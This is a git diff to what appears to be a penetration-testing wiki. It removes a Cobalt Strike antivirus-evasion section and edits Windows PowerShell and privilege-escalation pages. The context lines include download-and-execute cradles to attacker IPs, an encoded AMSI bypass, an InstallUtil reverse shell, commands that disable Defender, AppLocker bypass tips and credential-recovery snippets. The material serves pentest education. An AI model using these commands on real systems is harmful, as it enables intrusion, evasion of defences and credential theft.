diff --git a/c2/cobalt-strike.md b/c2/cobalt-strike.md index 790f3b915..140ca5940 100644 --- a/c2/cobalt-strike.md +++ b/c2/cobalt-strike.md @@ -171,33 +171,3 @@ beacon> socks 1080 # SSH connection beacon> ssh 10.10.17.12:22 username password - -## Avoiding AVs - -### Artifact Kit - -Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons. - -Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary. - -After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`. - -``` -pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe . -``` - -Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded. - -### Resource Kit - -The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA. - -Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it: - -``` -.\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1 -``` - -Modifying the detected lines one can generate a template that won't be caught. - -Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded. diff --git a/windows-hardening/basic-powershell-for-pentesters/README.md b/windows-hardening/basic-powershell-for-pentesters/README.md index 62d365e1b..ff5aae2c2 100644 --- a/windows-hardening/basic-powershell-for-pentesters/README.md +++ b/windows-hardening/basic-powershell-for-pentesters/README.md @@ -18,14 +18,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) ## Default PowerShell locations -``` +```powershell C:\windows\syswow64\windowspowershell\v1.0\powershell C:\Windows\System32\WindowsPowerShell\v1.0\powershell ``` ## Basic PS commands to start -```bash +```powershell Get-Help * #List everything loaded Get-Help process #List everything containing "process" Get-Help Get-Item -Full #Get full helpabout a topic @@ -36,7 +36,7 @@ Get-Command -Module ## Download & Execute -```bash +```powershell powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')" echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" @@ -48,13 +48,13 @@ $wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr ### Download & Execute in background with AMSI Bypass -```bash +```powershell Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=" ``` ### Using b64 from linux -```bash +```powershell echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0 powershell -nop -enc ``` @@ -63,25 +63,25 @@ powershell -nop -enc ### System.Net.WebClient -``` +```powershell (New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe") ``` ### Invoke-WebRequest -``` +```powershell Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe" ``` ### Wget -``` +```powershell wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe" ``` ### BitsTransfer -``` +```powershell Import-Module BitsTransfer Start-BitsTransfer -Source $url -Destination $output # OR @@ -90,7 +90,7 @@ Start-BitsTransfer -Source $url -Destination $output -Asynchronous ## Base64 Kali & EncodedCommand -```bash +```powershell kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0 PS> powershell -EncodedCommand ``` @@ -99,7 +99,7 @@ PS> powershell -EncodedCommand By default it is set to **restricted.** Main ways to bypass this policy: -``` +```powershell 1º Just copy and paste inside the interactive PS console 2º Read en Exec Get-Content .runme.ps1 | PowerShell.exe -noprofile - @@ -123,19 +123,19 @@ More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershel ## Constrained language -```bash +```powershell $ExecutionContext.SessionState.LanguageMode #Values could be: FullLanguage or ConstrainedLanguage ``` ### Bypass -```bash +```powershell #Easy bypass Powershell -version 2 ``` -In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add _C:\Windows\Microsoft.NET\assembly\GAC\_MSIL\System.Management.Automation\v4.0\_3.0.0.0\\_\_31bf3856ad364e35\System.Management.Automation.dll\_ and **change the project to .Net4.5**. +In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` and **change the project to .Net4.5**. #### Direct bypass: @@ -149,11 +149,13 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe ``` +You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode). + ## AppLockerPolicy Check which files/extensions are blacklisted/whitelisted. -``` +```powershell Get-ApplockerPolicy -Effective -xml Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections $a = Get-ApplockerPolicy -effective @@ -162,7 +164,7 @@ $a.rulecollections ## Enable WinRM (Remote PS) -```bash +```powershell enable-psremoting -force #This enables winrm # Change NetWorkConnection Category to Private @@ -178,15 +180,32 @@ Get-NetConnectionProfile | ## Disable Defender -```bash +```powershell # Check status Get-MpComputerStatus +Get-MpPreference | select Exclusion* | fl #Check exclusions # Disable Set-MpPreference -DisableRealtimeMonitoring $true #To completely disable Windows Defender on a computer, use the command: New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force # Set exclusion path Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk" +Set-MpPreference -ExclusionPath "C:\users\public\documents\magichk" + +# Check exclusions configured via GPO +Parse-PolFile .\Registry.pol + +KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions +ValueName : Exclusions_Paths +ValueType : REG_DWORD +ValueLength : 4 +ValueData : 1 + +KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths +ValueName : C:\Windows\Temp +ValueType : REG_SZ +ValueLength : 4 +ValueData : 0 ``` ### AMSI bypass @@ -197,7 +216,7 @@ Therefore, the goal of the AMSI bypasses you will are are to **overwrite the ins **AMSI bypass generator** web page: [**https://amsi.fail/**](https://amsi.fail/)**** -```bash +```powershell # A Method [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) @@ -244,19 +263,19 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html ## PS-History -```bash +```powershell Get-Content C:\Users\\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt ``` ## Get permissions -```bash +```powershell Get-Acl -Path "C:\Program Files\Vuln Services" | fl ``` ## OS version and HotFixes -```bash +```powershell [System.Environment]::OSVersion.Version #Current OS version Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches Get-Hotfix -description "Security update" #List only "Security Update" patches @@ -264,20 +283,20 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches ## Environment -```bash +```powershell Get-ChildItem Env: | ft Key,Value #get all values $env:UserName @Get UserName value ``` ## Other connected drives -```bash +```powershell Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root ``` ### Recycle Bin -```bash +```powershell $shell = New-Object -com shell.application $rb = $shell.Namespace(10) $rb.Items() @@ -293,14 +312,14 @@ $rb.Items() ## Users -```bash +```powershell Get-LocalUser | ft Name,Enabled,Description,LastLogon Get-ChildItem C:\Users -Force | select Name ``` ## Secure String to Plaintext -```bash +```powershell $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring $user = "HTB\Tom" $cred = New-Object System.management.Automation.PSCredential($user, $pass) @@ -314,7 +333,7 @@ Domain : HTB Or directly parsing form XML: -```bash +```powershell $cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List * UserName : Tom @@ -325,7 +344,7 @@ Domain : HTB ## SUDO -```bash +```powershell #CREATE A CREDENTIAL OBJECT $pass = ConvertTo-SecureString '' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential("", $pass) @@ -349,20 +368,20 @@ $computer = "" ## Groups -```bash +```powershell Get-LocalGroup | ft Name #All groups Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators ``` ## Clipboard -``` +```powershell Get-Clipboard ``` ## Processes -``` +```powershell Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id ``` @@ -374,7 +393,7 @@ Get-Service ## Password from secure string -```bash +```powershell $pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file $cred=new-object system.management.automation.pscredential("administrator", $pw) $cred.getnetworkcredential() | fl * #Get plaintext password @@ -382,7 +401,7 @@ $cred.getnetworkcredential() | fl * #Get plaintext password ## Scheduled Tasks -```bash +```powershell Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State ``` @@ -390,14 +409,14 @@ Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,Tas ### Interfaces -``` +```powershell Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address Get-DnsClientServerAddress -AddressFamily IPv4 | ft ``` ### Firewall -```bash +```powershell Get-NetFirewallRule -Enabled True Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block @@ -412,32 +431,32 @@ Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Tab ### Route -``` +```powershell route print ``` ### ARP -``` +```powershell Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State ``` ### Hosts -``` +```powershell Get-Content C:\WINDOWS\System32\drivers\etc\hosts ``` ### Ping -```bash +```powershell $ping = New-Object System.Net.Networkinformation.Ping 1..254 | % { $ping.send("10.9.15.$_") | select address, status } ``` ### SNMP -``` +```powershell Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse ``` diff --git a/windows-hardening/windows-local-privilege-escalation/README.md b/windows-hardening/windows-local-privilege-escalation/README.md index c30122182..aa1c05686 100644 --- a/windows-hardening/windows-local-privilege-escalation/README.md +++ b/windows-hardening/windows-local-privilege-escalation/README.md @@ -362,13 +362,17 @@ Get-MpComputerStatus Check which files/extensions are blacklisted/whitelisted. -``` +```powershell Get-ApplockerPolicy -Effective -xml Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections $a = Get-ApplockerPolicy -effective $a.rulecollections ``` +AppLocker rules applied to a host can also be read from the local registry at `HKLM\Software\Policies\Microsoft\Windows\SrpV2`. + + + **Useful Writable folders to bypass AppLocker Policy** ``` @@ -378,6 +382,14 @@ C:\Windows\Tasks C:\windows\tracing ``` +Commonly trusted [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries can be also useful to bypass AppLocker. + +**Poorly written rules could also be bypassed**, like ``, you can create a folder called allowed anywhere and it will be allowed. + +**DLL enforcement very rarely enabled** due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break. So using DLLs as backdoors will help bypassing AppLocker. + +You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass AppLocker. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode). + ### UAC UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user.\